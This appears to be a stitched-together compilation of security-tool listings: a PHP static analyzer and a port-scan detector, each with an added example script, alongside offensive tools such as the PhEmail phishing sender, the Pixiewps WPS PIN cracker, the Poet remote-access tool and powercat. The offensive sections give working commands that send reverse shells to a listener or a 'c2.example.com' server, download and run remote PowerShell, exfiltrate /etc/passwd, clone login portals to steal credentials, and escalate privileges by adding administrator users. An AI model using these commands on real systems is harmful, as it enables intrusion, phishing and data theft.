Download Pentoo 2015
PHAN - STATIC ANALYZER FOR PHP

Phan is a static analyzer for PHP.

Getting it running
Phan requires PHP 7+ with the php-ast extension loaded. The code you analyze can be written for any version of PHP.
To get phan running:
1. Clone the repo
2. Run composer install to load dependencies
3. Run ./test to run the test suite
4. Test phan on itself by running the following
./phan `find src/ -type f -path '*.php'`

If you don't have a version of PHP 7 installed, you can grab a php7dev Vagrant image or one of the many Docker builds out there.
Then compile php-ast. Something along these lines should do it:
git clone https://github.com/nikic/php-ast.git
cd php-ast
phpize
./configure
make install

And add extension=ast.so to your php.ini file. Check that it is there with php -m. If it isn't, you probably added it to the wrong php.ini file. Check php --ini to see where it is looking.
Features

Checks for calls and instantiations of undeclared functions, methods, closures and classes
Checks types of all arguments and return values to/from functions, closures and methods
Supports @param, @return, @var and @deprecated phpdoc comments including union and void/null types
Checks for Uniform Variable Syntax PHP 5 -> PHP 7 BC breaks
Undefined variable tracking
Supports namespaces, traits and variadics
Generics (from phpdoc hints - int[], string[], UserObject[], etc.)
See the tests directory for some examples of the various checks.

Usage
phan *.php

or give it a text file containing a list of files (but see the next section) to scan:
phan -f filelist.txt

and it might generate output that looks like this:

test1.php:191 UndefError call to undefined function get_real_size()
test1.php:232 UndefError static call to undeclared class core\session\manager
test1.php:386 UndefError Trying to instantiate undeclared class lang_installer
test2.php:4 TypeError arg#1(arg) is object but escapeshellarg() takes string
test2.php:4 TypeError arg#1(msg) is int but logmsg() takes string defined at sth.php:5
test2.php:4 TypeError arg#2(level) is string but logmsg() takes int defined at sth.php:5
test3.php:11 TypeError arg#1(number) is string but number_format() takes float
test3.php:12 TypeError arg#1(string) is int but htmlspecialchars() takes string
test3.php:13 TypeError arg#1(str) is int but md5() takes string
test3.php:14 TypeError arg#1(separator) is int but explode() takes string
test3.php:14 TypeError arg#2(str) is int but explode() takes string

You can see the full list of command line options by running phan -h.
Generating a file list

This static analyzer does not track includes or try to figure out autoloader magic. It treats all the files you throw at it as one big application. For code encapsulated in classes this works well. For code running in the global scope it gets a bit tricky because order matters. If you have an index.php including a file that sets a bunch of global variables and you then try to access those after the include in index.php, the static analyzer won't know anything about these.
In practical terms this simply means that you should put your entry points and any files setting things in the global scope at the top of your file list. If you have a config.php that sets global variables that everything else needs, put that first in the list, followed by your various entry points, then all your library files containing your classes.

Bugs

When you find an issue, please take the time to create a tiny reproducing code snippet that illustrates the bug. And once you have done that, fix it. Then turn your code snippet into a test and add it to tests, then ./test and send a PR with your fix and test. Alternatively, you can open an Issue with details.

More on phpdoc types

All the phpdoc types listed on that page should work with one exception. It says that (int|string)[] would indicate an array of ints or strings. phan doesn't support a mixed-type constraint like that. You can say int[]|string[] meaning that the array has to contain either all ints or all strings, but if you have mixed types, just use array.
That means you can do:
<?php
/**
 * MyFunc
 * @param int $arg1
 * @param int|string $arg2
 * @param int[]|int $arg3
 * @param Datetime|Datetime[] $arg4
 * @return array|null
 */
function MyFunc($arg1, $arg2, $arg3, $arg4=null) {
    return null;
}

Just like in PHP, any type can be nulled in the function declaration, which also means a null is allowed to be passed in for that parameter.
By default, and completely arbitrarily, for things like int[] it checks the first 5 elements. If the first 5 are of the same type, it assumes the rest are as well. If it can't determine the array subtype it just becomes array, which will pass through most type checks. In practical terms, this means that [1,2,'a'] is seen as array but [1,2,3] is int[] and ['a','b','c'] is string[].
Dealing with dynamic code that confuses the analyzer

There are times when there is just no way for the analyzer to get things right. For example:
<?php
function test() {
    $var = 0;
    $var = call_some_func_you_cant_hint();
    if(is_string($var)) {
        $pos = strpos($var, '|');
    }
}

Your best option is, of course, to go and add a /** @return string|array */ comment to the call_some_func_you_cant_hint() function, but there are times when that is not an option. As far as the analyzer is concerned, $var is an int because all it sees is the $var = 0; assignment. It will complain about you passing an int to strpos(). You can help it out by adding a @var doc-type comment before the function:
<?php
/**
 * @var string|array $var
 */
function test() {
    ...

This tells the analyzer that along with the int that it figures out on its own, $var can also be a string or an array inside that function. This is a departure from the normal use of the @var tag, which is to give properties types, so I don't suggest making a habit of using this hack. But it can be handy to shut up the analyzer without having to refactor the code to not overload the same variable with many different types.
How it works

One of the big changes in PHP 7 is the fact that the parser now uses a real Abstract Syntax Tree (AST). This makes it much easier to write code analysis tools by pulling the tree and walking it looking for interesting things.
Phan has 2 passes. On the first pass it reads every file, gets the AST and recursively parses it looking only for functions, methods and classes in order to populate a bunch of global hashes which will hold all of them. It also loads up definitions for all internal functions and classes. The type info for these comes from a big file called FunctionSignatureMap.
The real complexity hits you hard in the second pass. Here some things are done recursively depth-first and others not. For example, we catch something like foreach($arr as $k=>$v) because we need to tell the foreach code block that $k and $v exist. For other things we need to recurse as deeply as possible into the tree before unrolling our way back out. For example, for something like c(b(a(1))) we need to call a(1) and check that a() actually takes an int, then get the return type and pass it to b() and check that, before doing the same to c().
There is a Scope object which keeps track of all variables. It mimics PHP's scope handling in that it has a globals along with entries for each function, method and closure. This is used to detect undefined variables and also type-checked on a return $var.
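
The two-pass design described above, reduced to a toy analyzer. This is an added example and not Phan's code: Phan walks PHP's AST, while this walks Python's ast module so it runs without php-ast, but the structure is the same: pass 1 collects declared signatures plus a small stand-in for FunctionSignatureMap, pass 2 evaluates nested calls depth-first (a(1) before b(), before c()), checks argument and return types, and keeps one scope per function for undefined-variable tracking. All sample source and signatures are constructed.

```python
"""Toy two-pass static analyzer in the shape Phan's README describes.

Added example, not Phan's code. Works on Python source via the standard
ast module; flat function bodies only, so it stays short.
"""
import ast
from typing import Dict, List, Tuple

Signature = Tuple[List[Tuple[str, str]], str]   # ([(param, type), ...], return type)

# Stand-in for FunctionSignatureMap: types of "internal" functions whose
# source the analyzer never sees (constructed subset).
INTERNAL_SIGS: Dict[str, Signature] = {
    "str": ([("obj", "mixed")], "str"),
    "len": ([("obj", "mixed")], "int"),
}


def type_name(annotation) -> str:
    """Annotation node -> type name; anything unrecognised is 'mixed'."""
    if isinstance(annotation, ast.Name):
        return annotation.id
    if isinstance(annotation, ast.Constant) and annotation.value is None:
        return "None"
    return "mixed"


def collect_signatures(tree: ast.Module) -> Dict[str, Signature]:
    """Pass 1: record parameter and return types of every declared function."""
    sigs = dict(INTERNAL_SIGS)
    for node in ast.walk(tree):
        if isinstance(node, ast.FunctionDef):
            params = [(a.arg, type_name(a.annotation)) for a in node.args.args]
            sigs[node.name] = (params, type_name(node.returns))
    return sigs


def infer(expr, sigs, scope, issues, fname) -> str:
    """Pass 2 helper: the type of an expression. Nested calls are resolved
    innermost first, so for c(b(a(1))) a(1) is checked and its return type
    is known before b() is checked, then c()."""
    if isinstance(expr, ast.Constant):
        return "None" if expr.value is None else type(expr.value).__name__
    if isinstance(expr, ast.Name):                       # Scope lookup
        if expr.id not in scope:
            issues.append(f"{fname}:{expr.lineno} UndefError variable {expr.id} is undefined")
            return "mixed"
        return scope[expr.id]
    if isinstance(expr, ast.Call) and isinstance(expr.func, ast.Name):
        callee = expr.func.id
        arg_types = [infer(a, sigs, scope, issues, fname) for a in expr.args]
        if callee not in sigs:
            issues.append(f"{fname}:{expr.lineno} UndefError call to undefined function {callee}()")
            return "mixed"
        params, ret = sigs[callee]
        for i, ((pname, ptype), atype) in enumerate(zip(params, arg_types), 1):
            if "mixed" not in (ptype, atype) and ptype != atype:
                issues.append(f"{fname}:{expr.lineno} TypeError arg#{i}({pname}) is {atype} but {callee}() takes {ptype}")
        return ret
    return "mixed"                                       # operators etc. are not modelled


def analyze(source: str, fname: str = "sample.py") -> List[str]:
    """Run both passes over one file; returns Phan-style issue strings."""
    tree = ast.parse(source)
    sigs = collect_signatures(tree)
    issues: List[str] = []
    for func in tree.body:
        if not isinstance(func, ast.FunctionDef):
            continue
        params, declared_ret = sigs[func.name]
        scope = dict(params)                             # one Scope per function
        for stmt in func.body:
            if isinstance(stmt, ast.Assign) and isinstance(stmt.targets[0], ast.Name):
                scope[stmt.targets[0].id] = infer(stmt.value, sigs, scope, issues, fname)
            elif isinstance(stmt, ast.Return) and stmt.value is not None:
                got = infer(stmt.value, sigs, scope, issues, fname)
                if "mixed" not in (got, declared_ret) and got != declared_ret:
                    issues.append(f"{fname}:{stmt.lineno} TypeError return {got} but {func.name}() is declared to return {declared_ret}")
            elif isinstance(stmt, ast.Expr):
                infer(stmt.value, sigs, scope, issues, fname)
    return issues


# Constructed input: the nested-call case from the README, a wrongly typed
# return, an undefined function and an undefined variable.
SAMPLE = """\
def a(n: int) -> str:
    return str(n)

def b(s: str) -> int:
    return len(s)

def c(n: int) -> int:
    return n

def bad() -> int:
    return a(2)

def main() -> None:
    x = c(b(a(1)))
    y = c(a(1))
    z = get_real_size()
    return w
"""

if __name__ == "__main__":
    for issue in analyze(SAMPLE):
        print(issue)
```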
Quick Mode Explained

In Quick-mode the scanner doesn't rescan a function or a method's code block every time a call is seen. This means that the problem here won't be detected:
<?php
function test($arg):int {
    return $arg;
}
test("abc");

This would normally generate:
test.php:3 TypeError return string but `test()` is declared to return int

The initial scan of the function's code block has no type information for $arg. It isn't until we see the call and rescan test()'s code block that we can detect that it is actually returning the passed-in string instead of an int as declared.

Running tests
vendor/bin/phpunit

Download Phan
PHEMAIL - AUTOMATE SENDING PHISHING EMAILS

PhEmail is a Python open source phishing email tool that automates the process of sending phishing emails as part of a social engineering test. The main purpose of PhEmail is to send a bunch of phishing emails and prove who clicked on them, without attempting to exploit the web browser or email client but collecting as much information as possible. PhEmail comes with an engine to gather email addresses through LinkedIN, useful during the information gathering phase. Also, this tool supports Gmail authentication, which is a valid option in case the target domain has blacklisted the source email or IP address. Finally, this tool can be used to clone corporate login portals in order to steal login credentials.

Usage
PHishing EMAIL tool v0.13
Usage: phemail.py [-e <emails>] [-m <mail_server>] [-f <from_address>] [-r <replay_address>] [-s <subject>] [-b <body>]
   -e   emails: File containing list of emails (Default: emails.txt)
   -f   from_address: Source email address displayed in FROM field of the email (Default: Name Surname <name_surname@example.com>)
   -r   reply_address: Actual email address used to send the emails in case that people reply to the email (Default: Name Surname <name_surname@example.com>)
   -s   subject: Subject of the email (Default: Newsletter)
   -b   body: Body of the email (Default: body.txt)
   -p   pages: Specifies number of results pages searched (Default: 10 pages)
   -v   verbose: Verbose Mode (Default: false)
   -l   layout: Send email with no embedded pictures
   -B   BeEF: Add the hook for BeEF
   -m   mail_server: SMTP mail server to connect to
   -g   Google: Use a google account username:password
   -t   Time delay: Add deleay between each email (Default: 3 sec)
   -R   Bunch of emails per time (Default: 10 emails)
   -L   webserverLog: Customise the name of the webserver log file (Default: Date time in format "%d_%m_%Y_%H_%M")
   -S   Search: query on Google
   -d   domain: of email addresses
   -n   number: of emails per connection (Default: 10 emails)
   -c   clone: Clone a web page
   -w   website: where the phishing email link points to
   -o   save output in a file
   -F   Format (Default: 0):
        0- firstname surname
        1- firstname.surname@example.com
        2- firstnamesurname@example.com
        3- f.surname@example.com
        4- firstname.s@example.com
        5- surname.firstname@example.com
        6- s.firstname@example.com
        7- surname.f@example.com
        8- surnamefirstname@example.com
        9- firstname_surname@example.com
Examples: phemail.py -e emails.txt -f "Name Surname <name_surname@example.com>" -r "Name Surname <name_surname@example.com>" -s "Subject" -b body.txt
          phemail.py -S example -d example.com -F 1 -p 12
          phemail.py -c https://example.com

Disclaimer

Usage of PhEmail for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program.

Download PhEmail
PIXIEWPS - BRUTEFORCE OFFLINE THE WPS PIN (PIXIE DUST ATTACK)

Pixiewps is a tool written in C used to bruteforce offline the WPS pin, exploiting the low or non-existing entropy of some APs (pixie dust attack). It is meant for educational purposes only. All credits for the research go to Dominique Bongard.

DEPENDENCIES

Pixiewps requires libssl. To install it:
sudo apt-get install libssl-dev

INSTALLATION

Pixiewps can be built and installed by running:
~/pixiewps$ cd src
~/pixiewps/src$ make
~/pixiewps/src$ sudo make install

USAGE
Usage: pixiewps <arguments>
Required Arguments:
  -e, --pke         : Enrollee public key
  -r, --pkr         : Registrar public key
  -s, --e-hash1     : Enrollee Hash1
  -z, --e-hash2     : Enrollee Hash2
  -a, --authkey     : Authentication session key
Optional Arguments:
  -n, --e-nonce     : Enrollee nonce
  -m, --r-nonce     : Registrar nonce
  -b, --e-bssid     : Enrollee BSSID
  -S, --dh-small    : Small Diffie-Hellman keys (PKr not needed)   [No]
  -f, --force       : Bruteforce the whole keyspace                [No]
  -v, --verbosity   : Verbosity level 1-3, 1 is quietest           [3]
  -h, --help        : Display this usage screen

USAGE EXAMPLE

A common usage example is:
pixiewps --pke <pke> --pkr <pkr> --e-hash1 <e-hash1> --e-hash2 <e-hash2> --authkey <authkey> --e-nonce <enonce>

which requires a modified version of Reaver or Bully which prints AuthKey. The recommended version is reaver-wps-fork-t6x.
If the following message is shown:
[!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.
then the AP might be vulnerable and Pixiewps should be run again with the same set of data along with the option --force, or alternatively with a newer set of data.

DESCRIPTION OF ARGUMENTS
-e, --pke
    Enrollee's DH public key, found in M1.
-r, --pkr
    Registrar's DH public key, found in M2, or can be avoided by specifying --dh-small in both Reaver and Pixiewps.
-s, --e-hash1
    Enrollee Hash-1, found in M3.
-z, --e-hash2
    Enrollee Hash-2, found in M3.
-a, --authkey
    Registration Protocol authentication session key. Although for this parameter a modified version of Reaver or Bully is needed, it can be avoided by specifying small Diffie-Hellman keys in both Reaver and Pixiewps and supplying --e-nonce, --r-nonce and --e-bssid.
-n, --e-nonce
    Enrollee's nonce, found in M1.
-m, --r-nonce
    Registrar's nonce, found in M2.
-b, --e-bssid
    Enrollee's BSSID.
-S, --dh-small
    Small Diffie-Hellman keys. The same option MUST be specified in Reaver (1.3 or later versions) too. This option should be avoided when possible.
-f, --force
    Force Pixiewps to bruteforce the whole keyspace (only for one type of PRNG). It could take up to several minutes to complete.
-v, --verbosity
    Verbosity level (1-3). Level 3 displays the most information.
-h, --help
    Display usage screen.

Download Pixiewps
PLECOST - WORDPRESS VULNERABILITIES FINDER

Plecost is a vulnerability fingerprinting and vulnerability finder for the WordPress blog engine.

Why?

There are a huge number of WordPress sites around the world. Most of them are exposed to being attacked and converted into a virus, malware or illegal porn provider, without the knowledge of the blog owner.
This project tries to help sysadmins and blog owners make their WordPress a bit more secure.

What's new?

This Plecost 3 version adds a lot of new features and fixes, like:
Fixed a lot of bugs.
New engine: without threads or any dependencies, but runs faster. It uses Python 3 asyncio and non-blocking connections. It also consumes less memory. Incredible, right? :)
Changed CVE update system and storage: now Plecost gets vulnerabilities directly from NIST and creates a local SQLite database with filtered information for WordPress and its plugins.
WordPress vulnerabilities: now Plecost also manages WordPress vulnerabilities (not only for the plugins).
The local vulnerability database is queryable: you can consult the vulnerabilities for a concrete WordPress version or plugin using the local database.
You can read the entire list in the CHANGELOG file.

Installation

Installing Plecost is easy:
$ python3 -m pip install plecost

Remember that Plecost3 only runs in Python 3.

Quick start

Scanning a web site is simple:
$ plecost http://SITE.com

A bit more complex scan: increasing verbosity and exporting results in JSON format and XML:
JSON
$ plecost -v http://SITE.com -o results.json

XML
$ plecost -v http://SITE.com -o results.xml

Advanced scan options

Don't check the WordPress version, only plugins:
$ plecost -nc http://SITE.com

Force scan, even if WordPress was not detected:
$ plecost -f http://SITE.com

Display only the short banner:
$ plecost -nb http://SITE.com

List available wordlists:
$ plecost -nb -l
// Plecost - Wordpress finger printer Tool - v1.0.0
Available word lists:
1 - plugin_list_10.txt
2 - plugin_list_100.txt
3 - plugin_list_1000.txt
4 - plugin_list_250.txt
5 - plugin_list_50.txt
6 - plugin_list_huge.txt

Select a wordlist from the list:
$ plecost -nb -w plugin_list_10.txt http://SITE.com

Increasing concurrency (USE THIS OPTION WITH CAUTION. CAN SHUTDOWN TESTED SITE!):
$ plecost --concurrency 10 http://SITE.com

Or...
$ plecost -c 10 http://SITE.com

For more options, consult the --help command:
$ plecost -h

Updating

New versions and vulnerabilities are released daily; you can update the local database by writing:
Updating vulnerability database:
$ plecost --update-cve

Updating plugin list:
$ plecost --update-plugins

ScreenShots

Download Plecost
POET - A SIMPLE POST-EXPLOITATION TOOL

The client program runs on the target machine and is


configured with an IP address (the server) to connect to and a
frequency to connect at. If the server isn't running when the
client tries to connect, the client quietly sleeps and tries again
at the next interval. If the server is running however, the
attacker gets a control shell to control the client and perform
various actions on the target including:
reconnaissance
remote shell
file exfiltration
download and execute
self destruct
Getting started

Go to the releases page and download the latest poet-client


and poet-server files available.
Then skip to the Usage section below.
Alternatively, you can build Poet yourself (it's pretty easy).
Make sure you have the python2.7 and zip executables
available.
$ git clone https://github.com/mossberg/poet

$ cd poet
$ make

This will create a bin/ directory which contains poet-client


and poet-server.
Usage

Poet is super easy to use, and requires nothing more than the
Python (2.7) standard library. To easily try it out, a typical
invocation would look like:
Terminal 1:
$ ./poet-client -v 127.0.0.1 1

Terminal 2:
$ sudo ./poet-server

Note: By default, the server needs to be run as root (using


sudo) because the default port it binds to is 443. If that makes
you uncomfortable, simply omit sudo and use the -p <PORT>
flag on both the client and server. Pick a nice, high number for
your port (> 1024).
Of course, using the -h flag gives you the full usage.
$ ./poet-client -h
usage: poet-client [-h] [-p PORT] [-v] [-d] IP [INTERVAL]
positional arguments:
IP

server

INTERVAL

(s)

optional arguments:
-h, --help

show this help message and exit

-p PORT, --port PORT


-v, --verbose
-d, --delete

delete client upon execution

$ ./poet-server -h
usage: poet-server [-h] [-p PORT]
optional arguments:
-h, --help

show this help message and exit

-p PORT, --port PORT

Demo

This is just a small sample of what poet can do.


The scenario is, an attacker has gotten access to the victim's
machine and downloaded and executed the client (in verbose
mode ;). He/she does not have the server running at this point,
but it's ok, the client waits patiently. Eventually the attacker is
ready and starts the server, first starting a shell and executing
uname -a, then exfiltrating /etc/passwd. Then he/she exits and
detaches from the client, which continues running on the target
waiting for the next opportunity to connect to the server.
Victim's Machine (5.4.3.2):
$ ./poet-client -v 1.2.3.4 10
[+] Poet started with interval of 10 seconds to port 443.
Ctrl-c to exit.
[!] (2015-03-27 03:40:12.259676) Server is inactive
[!] (2015-03-27 03:40:22.263161) Server is inactive
[!] (2015-03-27 03:40:32.267308) Server is inactive
[+] (2015-03-27 03:40:42.273376) Server is active
[!] (2015-03-27 03:41:07.145979) Server is inactive
[!] (2015-03-27 03:41:17.150634) Server is inactive
[!] (2015-03-27 03:41:27.155614) Server is inactive
[!] (2015-03-27 03:41:37.160440) Server is inactive

Attacker's Machine (1.2.3.4):

# ./poet-server
_
____

____

___

/ /_

/ __ \/ __ \/ _ \/ __/
/ /_/ / /_/ /

__/ /

/ .___/\____/\___/\__/
/_/
[+] Poet server started on 443.
[+] (2015-03-27 03:40:42.272601) Connected By:
('5.4.3.2', 59309) -> VALID
[+] (2015-03-27 03:40:42.273087) Entering control shell
Welcome to psh, the Poet shell!
Running `help' will give you a list of supported
commands.
psh > shell
psh > user@server $ uname -a
Linux lolServer 3.8.0-29-generic #42~precise1-Ubuntu SMP
Wed May 07 16:19:23 UTC 2014 x86_64 x86_64 x86_64 GNU/
Linux
psh > user@server $ ^D
psh > exfil /etc/passwd
psh : exfil written to archive/20150327/exfil/
passwd-201503274054.txt
psh > help
Commands:
chint
dlexec
exec
exfil

exit
help
recon
selfdestruct
shell
psh > exit
[+] (2015-03-27 03:40:57.144083) Exiting control shell.
[-] (2015-03-27 03:40:57.144149) Poet server terminated.

Download Poet
PORTDOG - SIMPLE PYTHON SCRIPT TO DETECT PORT
SCANNING TECHNIQUES

PortDog is a network anomaly detector aimed at detecting port scanning techniques. It is entirely written in Python and has an easy-to-use interface. It was tested on Ubuntu 15. Please note that it does not work on Windows, because it depends on capturing raw packets; I am working on making the script work on both platforms. In the future I am thinking about adding firewall options that could block malicious attempts. It uses raw packets for analysis, so please make sure you run this script from a privileged session.
Usage:
sudo python portdog.py -t time_for_sniff_in_minutes

For example, if you want to detect for 5 minutes use:
sudo python portdog.py -t 5

For infinite detection use:
sudo python portdog.py -t 0

If you want to get the list of scanned ports, press CTRL+C to get the port list at runtime (if a scan happened).
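A detector in the spirit of PortDog's approach, as an added example that is not PortDog's own code: it consumes a constructed stream of TCP header records, flags any source that probes more than a threshold of distinct ports within a time window, and labels the technique from the TCP flag pattern. The Packet record, the window and threshold values, and the sample traffic are all assumptions made here.

```python
"""Added example (not PortDog's own code): a sliding-window port-scan
heuristic run over constructed TCP header records."""
from collections import Counter, defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class Packet:
    """Minimal view of one TCP packet header; constructed, not captured."""
    ts: float        # arrival time in seconds
    src: str         # source IPv4 address
    dst: str         # destination IPv4 address
    dport: int       # destination TCP port
    flags: str       # TCP flag letters, e.g. "S" (SYN), "FPU" (Xmas), "" (NULL)


@dataclass
class ScanReport:
    src: str
    technique: str
    ports: List[int]


# Flag patterns that identify classic probe styles; anything else is treated
# as an ordinary connect attempt and still counts toward the threshold.
TECHNIQUE_BY_FLAGS = {
    "S": "SYN (half-open) scan",
    "": "NULL scan",
    "F": "FIN scan",
    "FPU": "Xmas scan",
    "A": "ACK scan",
}


class PortScanDetector:
    """Flags a source that touches more than `threshold` distinct destination
    ports within `window` seconds. Both values are our own choice here."""

    def __init__(self, window: float = 60.0, threshold: int = 10) -> None:
        self.window = window
        self.threshold = threshold
        # src -> (timestamp, dport, flags) records still inside the window
        self._history: Dict[str, List[Tuple[float, int, str]]] = defaultdict(list)
        self._reported: Dict[str, ScanReport] = {}

    def feed(self, pkt: Packet) -> Optional[ScanReport]:
        """Consume one packet; return a ScanReport the moment a source crosses
        the threshold (once per source), otherwise None."""
        cutoff = pkt.ts - self.window
        hist = [h for h in self._history[pkt.src] if h[0] >= cutoff]
        hist.append((pkt.ts, pkt.dport, pkt.flags))
        self._history[pkt.src] = hist

        ports = sorted({dport for _, dport, _ in hist})
        if len(ports) <= self.threshold or pkt.src in self._reported:
            return None
        # The majority flag pattern inside the window names the technique
        pattern, _count = Counter(flags for _, _, flags in hist).most_common(1)[0]
        report = ScanReport(pkt.src, TECHNIQUE_BY_FLAGS.get(pattern, "connect/other scan"), ports)
        self._reported[pkt.src] = report
        return report

    def scanned_ports(self, src: str) -> List[int]:
        """Ports probed by `src` inside its current window (PortDog prints a
        comparable list on CTRL+C)."""
        return sorted({dport for _, dport, _ in self._history.get(src, [])})


def feed_all(packets: List[Packet], **kw) -> Tuple[PortScanDetector, List[ScanReport]]:
    """Run every packet through a fresh detector; return it and the reports raised."""
    det = PortScanDetector(**kw)
    reports = [r for r in (det.feed(p) for p in packets) if r is not None]
    return det, reports


def sample_packets() -> List[Packet]:
    """Constructed traffic: a fast SYN sweep, a slow Xmas sweep spread out
    beyond the window, and an ordinary client touching three services."""
    pk = [Packet(100.0 + i * 0.1, "10.0.0.5", "10.0.0.20", 20 + i, "S") for i in range(15)]
    pk += [Packet(200.0 + i * 100.0, "10.0.0.9", "10.0.0.20", 1000 + i, "FPU") for i in range(15)]
    pk += [Packet(150.0 + i, "10.0.0.7", "10.0.0.20", p, "S") for i, p in enumerate((22, 80, 443))]
    return sorted(pk, key=lambda p: p.ts)


if __name__ == "__main__":
    _det, found = feed_all(sample_packets())
    for r in found:
        print(f"{r.src}: {r.technique}, ports {r.ports}")
```

The slow sweep is deliberately left undetected: one probe per 100 seconds never accumulates more than one port inside a 60-second window, which is the limitation a practitioner should keep in mind when tuning the window.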

Download PortDog
PORTEXPERT - MONITORS ALL APPLICATIONS
CONNECTED TO THE INTERNET

PortExpert gives you a detailed view of your personal computer's cybersecurity. It automatically monitors all applications connected to the Internet and gives you all the information you might need to identify potential threats to your system.
Features

Monitors applications using TCP/UDP communications
User-friendly interface
Identifies remote servers (WhoIs service)
Allows opening the containing folder of any application
Allows easily searching for more info online
Automatic identification of related services: FTP, HTTP, HTTPS, ...
Capability to show/hide system-level processes
Capability to show/hide loopbacks
Time freeze function

Download PortExpert
POWERCAT - NETCAT: THE POWERSHELL VERSION

Installation
powercat is a PowerShell function. First you need to load the function before you can execute it. You can put one of the commands below into your PowerShell profile so powercat is automatically loaded when PowerShell starts.
Load The Function From Downloaded .ps1 File:
. .\powercat.ps1
Load The Function From URL:
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

Parameters:
-l      [Switch]   Listen for a connection.
-c      [String]   Connect to a listener.
-p      [String]   The port to connect to, or listen on.
-e      [String]   Execute. (GAPING_SECURITY_HOLE)
-ep     [Switch]   Execute Powershell.
-r      [String]   Relay. Format: "-r tcp:10.1.1.1:443"
-u      [Switch]   Transfer data over UDP.
-dns    [String]   Transfer data over dns (dnscat2).
-dnsft  [int32]    DNS Failure Threshold.
-t      [int32]    Timeout option. Default: 60
-i      [object]   Input: Filepath (string), byte array, or string.
-o      [String]   Console Output Type: "Host", "Bytes", or "String"
-of     [String]   Output File Path.
-d      [Switch]   Disconnect after connecting.
-rep    [Switch]   Repeater. Restart after disconnecting.
-g      [Switch]   Generate Payload.
-ge     [Switch]   Generate Encoded Payload.
-h      [Switch]   Print the help message.

Basic Connections

By default, powercat reads input from the console and writes output to the console using write-host. You can change the output type to 'Bytes' or 'String' with -o.
Basic Client:
powercat -c 10.1.1.1 -p 443
Basic Listener:
powercat -l -p 8000
Basic Client, Output as Bytes:
powercat -c 10.1.1.1 -p 443 -o Bytes

File Transfer

powercat can be used to transfer files back and forth using -i (Input) and -of (Output File).
Send File:
powercat -c 10.1.1.1 -p 443 -i C:\inputfile
Receive File:
powercat -l -p 8000 -of C:\inputfile

Shells

powercat can be used to send and serve shells. Specify an executable to -e, or use -ep to execute powershell.
Serve a cmd Shell:
powercat -l -p 443 -e cmd
Send a cmd Shell:
powercat -c 10.1.1.1 -p 443 -e cmd
Serve a shell which executes powershell commands:
powercat -l -p 443 -ep

DNS and UDP

powercat supports more than sending data over TCP. Specify -u to enable UDP mode. Data can also be sent to a dnscat2 server with -dns.
Send Data Over UDP:
powercat -c 10.1.1.1 -p 8000 -u
powercat -l -p 8000 -u
Connect to the c2.example.com dnscat2 server using the
DNS server on 10.1.1.1:
powercat -c 10.1.1.1 -p 53 -dns c2.example.com
Send a shell to the c2.example.com dnscat2 server using
the default DNS server in Windows:
powercat -dns c2.example.com -e cmd

Relays

Relays in powercat work just like traditional netcat relays, but you don't have to create a file or start a second process. You can also relay data between connections of different protocols.
TCP Listener to TCP Client Relay:
powercat -l -p 8000 -r tcp:10.1.1.16:443
TCP Listener to UDP Client Relay:
powercat -l -p 8000 -r udp:10.1.1.16:53
TCP Listener to DNS Client Relay:
powercat -l -p 8000 -r dns:10.1.1.1:53:c2.example.com
TCP Listener to DNS Client Relay using the Windows Default DNS Server:
powercat -l -p 8000 -r dns:::c2.example.com
TCP Client to Client Relay:
powercat -c 10.1.1.1 -p 9000 -r tcp:10.1.1.16:443
TCP Listener to Listener Relay:
powercat -l -p 8000 -r tcp:9000

Generate Payloads

Payloads which do a specific action can be generated using -g (Generate Payload) and -ge (Generate Encoded Payload).
Encoded payloads can be executed with powershell -E. You
can use these if you don't want to use all of powercat.
Generate a reverse tcp payload which connects back to
10.1.1.15 port 443:
powercat -c 10.1.1.15 -p 443 -e cmd -g
Generate a bind tcp encoded command which listens on port
8000:
powercat -l -p 8000 -e cmd -ge

Misc Usage

powercat can also be used to perform portscans, and start persistent servers.
Basic TCP Port Scanner:
(21,22,80,443) | % {powercat -c 10.1.1.10 -p $_ -t 1 -Verbose -d}
Start A Persistent Server That Serves a File:
powercat -l -p 443 -i C:\inputfile -rep

Download Powercat
POWERTOOLS - COLLECTION OF POWERSHELL
PROJECTS WITH A FOCUS ON OFFENSIVE OPERATIONS

Veil's PowerTools are a collection of PowerShell projects with a focus on offensive operations.
This collection contains five projects:
PowerUp
PowerBreach
PowerPick
PewPewPew
PowerView

PowerUp
PowerUp is a powershell tool to assist with local privilege
escalation on Windows systems. It contains several methods to
identify and abuse vulnerable services, as well as DLL hijacking
opportunities, vulnerable registry settings, vulnerable schtasks,
and more.
Service Enumeration:
Get-ServiceUnquoted - returns services with unquoted paths that also have a space in the name
Get-ServiceFilePermission - returns services where the current user can write to the service binary path or its config
Get-ServicePermission - returns services the current user can modify

Service Abuse:
Invoke-ServiceUserAdd - modifies a modifiable service to create a user and add it to the local administrators
Invoke-ServiceCMD - execute an arbitrary command through service abuse
Write-UserAddServiceBinary - writes out a patched C# service binary that adds a local administrative user
Write-CMDServiceBinary - writes out a patched C# binary that executes a custom command
Write-ServiceEXE - replaces a service binary with one that adds a local administrator user
Write-ServiceEXECMD - replaces a service binary with one that executes a custom command
Restore-ServiceEXE - restores a replaced service binary with the original executable
Invoke-ServiceStart - starts a given service
Invoke-ServiceStop - stops a given service
Invoke-ServiceEnable - enables a given service
Invoke-ServiceDisable - disables a given service
Get-ServiceDetail - returns detailed information about a service

DLL Hijacking:
Find-DLLHijack - finds .dll hijacking opportunities for currently running processes
Find-PathHijack - finds service %PATH% .dll hijacking opportunities
Write-HijackDll - writes out a hijackable .dll

Registry Checks:
Get-RegAlwaysInstallElevated - checks if the AlwaysInstallElevated registry key is set
Get-RegAutoLogon - checks for Autologon credentials in the registry
Get-VulnAutoRun - checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns

Misc.:
Get-VulnSchTask - finds schtasks with modifiable target files
Get-UnattendedInstallFile - finds remaining unattended installation files
Get-Webconfig - checks for any encrypted web.config strings
Get-ApplicationHost - checks for encrypted application pool and virtual directory passwords
Write-UserAddMSI - writes out an MSI installer that prompts for a user to be added
Invoke-AllChecks - runs all current escalation checks and returns a report

PowerBreach
